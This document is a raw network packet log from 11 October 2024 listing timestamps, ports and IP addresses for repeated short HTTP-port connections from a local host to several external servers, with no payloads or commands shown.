Oct 11, 2024 10:01:14.717080116 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.717474937 CEST	49825	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:14.725029945 CEST	49825	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:14.961004972 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.961096048 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.961158991 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.961241007 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.961304903 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.961370945 CEST	80	49825	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:14.961548090 CEST	49825	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:14.961901903 CEST	49825	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:16.226401091 CEST	49825	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.243808031 CEST	49826	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.415851116 CEST	80	49826	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:17.416256905 CEST	49826	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.421262026 CEST	49826	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.592257977 CEST	80	49826	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:17.592387915 CEST	80	49826	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:17.592458963 CEST	80	49826	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:17.592529058 CEST	80	49826	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:17.592879057 CEST	49826	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.592880011 CEST	49826	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.595963001 CEST	49826	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:01:17.822602034 CEST	80	49826	161.97.168.245	192.168.11.20
Oct 11, 2024 10:01:23.037347078 CEST	49827	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:23.235769987 CEST	80	49827	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:23.236073017 CEST	49827	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:23.243983984 CEST	49827	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:23.442279100 CEST	80	49827	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:23.442351103 CEST	80	49827	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:23.442401886 CEST	80	49827	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:23.442549944 CEST	49827	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:24.755561113 CEST	49827	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:25.777246952 CEST	49828	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:25.987318993 CEST	80	49828	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:25.987571001 CEST	49828	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:25.998155117 CEST	49828	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:26.208271980 CEST	80	49828	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:26.208374023 CEST	80	49828	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:26.208434105 CEST	80	49828	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:26.208698988 CEST	49828	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:27.505131006 CEST	49828	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:28.522356033 CEST	49829	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:28.715703964 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.715949059 CEST	49829	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:28.723764896 CEST	49829	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:28.723844051 CEST	49829	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:28.917299986 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917484045 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917534113 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917574883 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917752981 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917808056 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917860031 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917896986 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:28.917926073 CEST	49829	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:29.111210108 CEST	80	49829	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:31.256131887 CEST	49830	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:31.447539091 CEST	80	49830	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:31.447690010 CEST	49830	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:31.452837944 CEST	49830	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:31.644136906 CEST	80	49830	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:31.644340992 CEST	80	49830	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:31.644437075 CEST	80	49830	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:31.644581079 CEST	49830	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:31.646399975 CEST	49830	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:01:31.837683916 CEST	80	49830	65.21.196.90	192.168.11.20
Oct 11, 2024 10:01:38.436419964 CEST	49831	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:38.599395037 CEST	80	49831	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:38.599575043 CEST	49831	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:38.607176065 CEST	49831	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:38.763753891 CEST	80	49831	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:38.770071030 CEST	80	49831	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:38.770224094 CEST	49831	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:38.813510895 CEST	80	49831	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:38.933340073 CEST	80	49831	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:41.128957987 CEST	49832	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:41.294192076 CEST	80	49832	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:41.294342041 CEST	49832	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:41.301958084 CEST	49832	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:41.459801912 CEST	80	49832	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:41.466990948 CEST	80	49832	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:41.467158079 CEST	49832	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:41.510090113 CEST	80	49832	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:41.632524014 CEST	80	49832	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:43.831557035 CEST	49833	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:44.005325079 CEST	80	49833	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:44.005548954 CEST	49833	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:44.013292074 CEST	49833	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:44.179060936 CEST	80	49833	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:44.186675072 CEST	80	49833	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:44.186793089 CEST	49833	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:44.229293108 CEST	80	49833	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:44.359915972 CEST	80	49833	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:46.534051895 CEST	49834	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:46.699714899 CEST	80	49834	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:46.699894905 CEST	49834	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:46.704991102 CEST	49834	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:46.865782976 CEST	80	49834	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:46.870971918 CEST	80	49834	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:46.871135950 CEST	49834	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:01:46.915999889 CEST	80	49834	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:47.036736012 CEST	80	49834	172.247.44.157	192.168.11.20
Oct 11, 2024 10:01:52.373913050 CEST	49835	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:52.545062065 CEST	80	49835	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:52.545222998 CEST	49835	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:52.552850008 CEST	49835	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:52.723694086 CEST	80	49835	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:52.727741957 CEST	80	49835	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:52.727752924 CEST	80	49835	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:52.727952957 CEST	49835	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:54.061657906 CEST	49835	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:55.081104040 CEST	49836	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:55.252054930 CEST	80	49836	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:55.252253056 CEST	49836	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:55.259905100 CEST	49836	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:55.431432009 CEST	80	49836	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:55.435024977 CEST	80	49836	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:55.435036898 CEST	80	49836	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:55.435185909 CEST	49836	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:56.764189959 CEST	49836	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:57.781577110 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:57.952646971 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:57.952835083 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:57.960618973 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:57.960640907 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:57.960705042 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:58.132225990 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.132239103 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.132247925 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.132278919 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.132287979 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.135976076 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.136030912 CEST	80	49837	91.212.26.5	192.168.11.20
Oct 11, 2024 10:01:58.136177063 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:01:59.466715097 CEST	49837	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:02:00.484353065 CEST	49838	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:02:00.655257940 CEST	80	49838	91.212.26.5	192.168.11.20
Oct 11, 2024 10:02:00.655478954 CEST	49838	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:02:00.660604954 CEST	49838	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:02:00.831378937 CEST	80	49838	91.212.26.5	192.168.11.20
Oct 11, 2024 10:02:00.835939884 CEST	80	49838	91.212.26.5	192.168.11.20
Oct 11, 2024 10:02:00.835949898 CEST	80	49838	91.212.26.5	192.168.11.20
Oct 11, 2024 10:02:00.836242914 CEST	49838	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:02:00.838063955 CEST	49838	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:02:01.009916067 CEST	80	49838	91.212.26.5	192.168.11.20
Oct 11, 2024 10:02:05.946289062 CEST	49839	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:06.045573950 CEST	80	49839	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:06.045753956 CEST	49839	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:06.053538084 CEST	49839	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:06.152718067 CEST	80	49839	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:06.154675007 CEST	80	49839	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:06.154794931 CEST	49839	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:07.558670998 CEST	49839	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:07.658179045 CEST	80	49839	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:08.576116085 CEST	49840	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:08.675379038 CEST	80	49840	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:08.675529003 CEST	49840	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:08.683124065 CEST	49840	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:08.782404900 CEST	80	49840	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:09.697400093 CEST	80	49840	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:09.697566986 CEST	49840	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:10.198698997 CEST	49840	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:10.298053980 CEST	80	49840	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.216252089 CEST	49841	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:11.315440893 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.315639019 CEST	49841	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:11.323476076 CEST	49841	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:11.323527098 CEST	49841	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:11.422899008 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.422993898 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.423147917 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.423157930 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.423243046 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.423366070 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.423495054 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.424577951 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:11.424776077 CEST	49841	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:12.838740110 CEST	49841	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:12.938061953 CEST	80	49841	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:13.856177092 CEST	49842	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:13.956072092 CEST	80	49842	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:13.956310034 CEST	49842	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:13.961623907 CEST	49842	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:14.061537981 CEST	80	49842	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:14.990228891 CEST	80	49842	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:14.990283966 CEST	80	49842	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:14.990437031 CEST	49842	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:14.992269039 CEST	49842	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:14.995209932 CEST	80	49842	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:14.995349884 CEST	49842	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:02:15.092067003 CEST	80	49842	3.33.130.190	192.168.11.20
Oct 11, 2024 10:02:20.105825901 CEST	49843	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:20.400481939 CEST	80	49843	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:20.400620937 CEST	49843	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:20.408284903 CEST	49843	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:20.703053951 CEST	80	49843	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:20.703149080 CEST	80	49843	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:20.703289986 CEST	49843	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:21.914916039 CEST	49843	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:22.934166908 CEST	49844	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:23.229228020 CEST	80	49844	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:23.229408026 CEST	49844	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:23.237075090 CEST	49844	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:23.531836987 CEST	80	49844	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:23.531918049 CEST	80	49844	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:23.532170057 CEST	49844	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:24.742438078 CEST	49844	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:25.759846926 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:26.054898024 CEST	80	49845	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:26.055150986 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:26.062926054 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:26.062948942 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:26.063028097 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:26.357719898 CEST	80	49845	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:26.357945919 CEST	80	49845	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:26.358150005 CEST	80	49845	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:26.358433008 CEST	80	49845	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:26.358563900 CEST	80	49845	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:26.358728886 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:27.569937944 CEST	49845	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:28.587968111 CEST	49846	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:28.883127928 CEST	80	49846	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:28.883337021 CEST	49846	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:28.888482094 CEST	49846	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:29.183384895 CEST	80	49846	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:29.183487892 CEST	80	49846	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:29.183800936 CEST	49846	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:29.185633898 CEST	49846	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:02:29.480289936 CEST	80	49846	154.23.184.194	192.168.11.20
Oct 11, 2024 10:02:34.299253941 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:34.459868908 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.460042000 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:34.467709064 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:34.628413916 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.653064966 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.653182030 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.653211117 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.653223038 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.653450012 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:34.653450012 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:34.653465986 CEST	80	49847	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:34.653623104 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:35.974344969 CEST	49847	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:36.991755009 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:37.152399063 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.152584076 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:37.160213947 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:37.320806026 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.332559109 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.332659960 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.332710028 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.332768917 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.332906008 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:37.333055973 CEST	80	49848	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:37.333074093 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:37.333244085 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:38.661240101 CEST	49848	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:39.678654909 CEST	49849	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:39.839811087 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:39.839984894 CEST	49849	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:39.847791910 CEST	49849	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:39.847825050 CEST	49849	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:40.008770943 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.008785009 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.008882046 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.008891106 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.009119034 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.027215004 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.027237892 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.027250051 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.027307034 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.027316093 CEST	80	49849	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:40.027582884 CEST	49849	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:41.363743067 CEST	49849	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.381166935 CEST	49850	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.540537119 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.540740013 CEST	49850	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.545835018 CEST	49850	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.703926086 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.719320059 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.719333887 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.719418049 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.719428062 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.719439030 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:42.719623089 CEST	49850	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.719791889 CEST	49850	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.722682953 CEST	49850	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:02:42.880568027 CEST	80	49850	63.250.47.57	192.168.11.20
Oct 11, 2024 10:02:47.844371080 CEST	49851	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:47.938497066 CEST	80	49851	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:47.938713074 CEST	49851	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:47.946352959 CEST	49851	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:48.040494919 CEST	80	49851	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:48.475770950 CEST	80	49851	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:48.475784063 CEST	80	49851	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:48.475974083 CEST	49851	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:48.476619005 CEST	80	49851	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:48.476847887 CEST	49851	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:49.455754042 CEST	49851	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:50.473154068 CEST	49852	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:50.567260981 CEST	80	49852	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:50.567462921 CEST	49852	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:50.575058937 CEST	49852	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:50.669059038 CEST	80	49852	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:51.124764919 CEST	80	49852	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:51.124778986 CEST	80	49852	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:51.124931097 CEST	49852	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:51.125408888 CEST	80	49852	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:51.125564098 CEST	49852	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:52.080176115 CEST	49852	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.097603083 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.191849947 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.192070961 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.199892998 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.199915886 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.199990034 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.294362068 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.294431925 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.294884920 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.294949055 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.295070887 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.295080900 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.295178890 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.744210958 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.744275093 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.744417906 CEST	80	49853	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:53.744492054 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:53.744560957 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:54.704586029 CEST	49853	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:55.722028017 CEST	49854	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:55.815927982 CEST	80	49854	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:55.816239119 CEST	49854	80	192.168.11.20	172.67.220.57
